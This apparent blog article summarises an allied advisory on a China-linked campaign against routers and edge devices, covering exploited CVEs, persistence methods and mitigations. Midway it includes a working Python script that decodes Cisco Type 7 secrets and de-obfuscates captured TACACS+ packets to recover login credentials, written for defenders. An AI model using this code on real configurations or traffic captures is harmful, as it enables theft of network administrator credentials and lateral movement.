RED ALERT: China Conducts Global Espionage Campaign Exploiting Our Networks
- Gabriele Iuvinale

- 27 Aug
- Reading time: 3 min
Joint US-Allied Alert Reveals Espionage Campaign Undermining Critical Global Infrastructure
The Chinese government is conducting a global cyber espionage campaign, exploiting vulnerable network devices worldwide to feed a surveillance and intelligence system of unprecedented scale. A joint advisory issued by security agencies from the United States, United Kingdom, Canada, Australia and other partner nations lays out a threat that is no longer theoretical but tangible and active across the globe. This is not simple data theft: the aim is to build long-term intelligence infrastructure inside other countries' networks in support of Beijing's geopolitical objectives.

The War for Critical Infrastructure
The threat actors, referred to in the advisory simply as "Advanced Persistent Threat (APT) actors," have systematically targeted critical infrastructure networks worldwide, including telecommunications, government, transportation, lodging and military systems. The advisory links them to China-based companies such as Sichuan Juxinhe Network Technology and Beijing Huanyu Tianqiong Information Technology, which provide cyber-related products and services to China's intelligence services and the People's Liberation Army. The actors concentrate on large backbone routers and on provider edge (PE) and customer edge (CE) devices to gain a foothold in a network, then pivot into other networks over the trusted connections those devices carry. The ultimate goal is to collect data that can be used to identify and track targets' communications and movements anywhere in the world.
Tactics of Infiltration and Covert Persistence
The advisory describes a meticulous and aggressive strategy for infiltration and long-term control, designed to maximize intelligence collection while minimizing detection.
Massive Exploitation of Known Vulnerabilities: The attackers are having "considerable success" exploiting publicly known vulnerabilities (CVEs) on Internet-exposed network edge devices; none of these are zero-days. The advisory lists specific CVEs, including CVE-2024-21887 (Ivanti Connect Secure), CVE-2024-3400 (Palo Alto Networks PAN-OS GlobalProtect), and the chained Cisco IOS XE web UI flaws CVE-2023-20198 and CVE-2023-20273, the first of which is rated critical. Patching these alone is not sufficient: a device that was exploited before the patch may still carry the persistence described below.
Abuse of Trusted Connections and Multi-Hop Infiltration: A key element of this campaign is the attackers' ability to exploit trusted relationships, such as provider-to-provider or provider-to-customer links, to pivot from one compromised network to another. They use intermediate routers as a launchpad to infiltrate multiple targets, making it difficult to trace the attack's origin.
Covert Persistence and Credential Theft: Once inside, the attackers modify device configurations to keep long-term access, for example by moving SSH to non-standard high ports (the advisory cites patterns such as 22x22 or xx22, where x is any digit) and creating unauthorized administrative accounts. They also harvest credentials by using the routers' own packet capture (PCAP) capabilities to record authentication traffic such as TACACS+. This yields weak or reversibly encrypted passwords (such as Cisco Type 7, which is a fixed-key XOR rather than a hash), and because TACACS+ only obfuscates its payload with the shared key, a key recovered from a captured configuration also exposes the logins in the capture; both are used to compromise further accounts and move laterally. The attackers additionally abuse features like Cisco Guest Shell, a Linux container built into IOS XE, to run tools and process data on the device without leaving the usual host-based traces.
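The credential-theft chain described above, as an added example that is not code from the advisory or from this article: Cisco Type 7 is reversed with its well-known fixed key, and the captured TACACS+ body is stripped of its MD5-derived pad (RFC 8907 section 4.5) using the shared key recovered from the configuration. The configuration line, the shared key, the user name and the packet are all constructed for the demo; the PAP START layout follows RFC 8907.

```python
"""Type 7 reversal plus TACACS+ body de-obfuscation (added example, constructed data)."""
import hashlib
import struct

# The fixed key baked into IOS for Type 7; it is public, which is why Type 7 is reversible.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def type7_decode(encoded: str) -> str:
    """Type 7 = two-digit salt index followed by hex bytes XORed with TYPE7_KEY."""
    salt = int(encoded[:2])
    raw = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(salt + i) % len(TYPE7_KEY)] for i, b in enumerate(raw)).decode()


def type7_encode(plain: str, salt: int = 9) -> str:
    """Forward direction, included only to show it is a symmetric XOR, not a hash."""
    out = bytes(ord(c) ^ TYPE7_KEY[(salt + i) % len(TYPE7_KEY)] for i, c in enumerate(plain))
    return f"{salt:02d}{out.hex().upper()}"


# TACACS+ 12-byte header: version, type, seq_no, flags, session_id, body length
TACACS_HDR = struct.Struct("!BBBBII")
TAC_PLUS_UNENCRYPTED_FLAG = 0x01


def tacacs_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """RFC 8907 pseudo-pad: chained MD5(session_id | key | version | seq_no [| previous])."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, last = b"", b""
    while len(pad) < length:
        last = hashlib.md5(prefix + last).digest()
        pad += last
    return pad[:length]


def tacacs_body(packet: bytes, key: bytes) -> bytes:
    """XOR the body with the pad; the same call obfuscates and de-obfuscates."""
    version, _ptype, seq_no, flags, session_id, length = TACACS_HDR.unpack_from(packet)
    body = packet[TACACS_HDR.size:TACACS_HDR.size + length]
    if flags & TAC_PLUS_UNENCRYPTED_FLAG:
        return body  # cleartext deployments still exist; nothing to undo
    pad = tacacs_pad(session_id, key, version, seq_no, length)
    return bytes(b ^ p for b, p in zip(body, pad))


def build_pap_start(user: str, password: str, key: bytes, session_id: int) -> bytes:
    """Constructed authentication START (PAP) as a client would put it on the wire."""
    u, p = user.encode(), password.encode()
    # action=LOGIN(1), priv_lvl=15, authen_type=PAP(2), service=LOGIN(1), then four lengths
    body = struct.pack("!8B", 1, 15, 2, 1, len(u), 0, 0, len(p)) + u + p
    hdr = TACACS_HDR.pack(0xC0, 1, 1, 0x00, session_id, len(body))  # v12.0, type AUTHEN
    return hdr + tacacs_body(hdr + body, key)


def parse_pap_start(body: bytes) -> tuple:
    """Return (user, password) from a START body; PAP carries the password in 'data'."""
    _act, _priv, _atype, _svc, ulen, plen, rlen, dlen = struct.unpack_from("!8B", body)
    off = 8
    user = body[off:off + ulen].decode()
    off += ulen + plen + rlen
    return user, body[off:off + dlen].decode()


def recover_credentials(config_key_line: str, captured: bytes) -> tuple:
    """The attacker's two steps: Type 7 -> shared key, then strip the pad from the capture."""
    key = type7_decode(config_key_line.split()[-1]).encode()
    return parse_pap_start(tacacs_body(captured, key))


# Constructed "evidence": one config line and one packet as they would appear in a router PCAP
CONFIG_KEY_LINE = " key 7 094F471A1A0A464058"  # Type 7 of the (constructed) shared key
CAPTURED = build_pap_start("netadmin", "Wint3r2025!", b"cisco123", 0x1234ABCD)

if __name__ == "__main__":
    print(type7_decode("094F471A1A0A"))  # the textbook case
    print(recover_credentials(CONFIG_KEY_LINE, CAPTURED))
```

The point for defenders is that neither step needs any cryptanalysis: the Type 7 key is public and the TACACS+ pad is fully determined by the shared key plus header fields that travel in cleartext. Rotating the TACACS+ key after a suspected device compromise, and storing it with Type 6 AES (`password encryption aes`) rather than Type 7, removes what the capture depends on.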
The Required Response: An Aggressive Hunt
The advisory is a clear call to action. The participating agencies state that passive defense is no longer sufficient and urge network defenders to conduct an "active hunt" for the actors' presence, followed by a simultaneous and complete eviction. The document warns that partial or piecemeal response actions could tip off the adversary, prompting countermeasures to preserve their access, so evidence should be collected and the full scope established before remediation begins. In the context of cyber warfare the integrity of communication infrastructure is a fundamental battlefield, and organizations are advised to implement the recommended mitigations immediately to protect against this persistent and strategic threat.
Recommended mitigations include:
Risk Assessment: Regularly review router logs and configurations against a known-good baseline for signs of unusual activity, such as changes to Access Control Lists (ACLs), unauthorized routes, new local accounts, SSH listening on non-standard ports, or the activation of features like Guest Shell.
System Hardening: Use only encrypted and authenticated management protocols such as SSHv2 and HTTPS, disable unencrypted protocols such as Telnet and HTTP, and replace reversible Type 7 secrets with non-reversible password types wherever the platform allows.
Management Plane Isolation: Place management services on a dedicated out-of-band network or a separate Virtual Routing and Forwarding (VRF) instance, restricted by ACLs, so that a foothold in the data plane cannot reach device management or be used for lateral movement.
Active Monitoring: Continuously monitor traffic for unusual connections, especially tunnels, SSH sessions on unexpected ports, or file transfers originating from network devices themselves.


